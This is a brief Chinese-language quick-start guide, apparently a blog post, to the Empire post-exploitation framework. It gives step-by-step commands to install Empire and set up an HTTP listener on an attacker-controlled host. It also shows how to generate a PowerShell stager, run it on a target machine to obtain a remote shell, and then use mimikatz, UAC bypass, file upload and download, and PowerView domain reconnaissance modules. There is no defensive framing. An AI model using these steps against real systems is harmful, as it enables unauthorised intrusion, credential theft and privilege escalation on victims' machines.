Empire 速食指南

0x00 install

git clone https://github.com/EmpireProject/Empire.git
./setup/install.sh

0x01 quick start

安装完成之后./empire即可运行Empire
建立一个监听:

listeners
uselistener http
set Name Empire
set Host http://192.168.2.131:1080
execute

再返回主菜单(main)生成stager:

usestager windows/dll
set Listener Empire
execute
launcher powershell Empire

将生成的powershell命令在目标机器上执行即可拿到一个shell,agents命令可查看上线主机,interact NAME可以获得一个交互的shell

0x02 something others

你懂的

mimikatz
bypassuac

上传下载

download
upload

导入执行powershell:

scriptimport
scriptcmd

some module

situational_awareness/network/powerview/get_user (获取用户信息)
powershell/situational_awareness/network/powerview/user_hunter(查看有记录的当前域的所有与管理员的机器)
powershell/situational_awareness/network/powerview/get_localgroup(检测administrator群组用户)

使用searchmodule可以查看模块的说明,模块比较多,就不一一说明了

0x03 the end

我觉得我还是喜欢msf多一些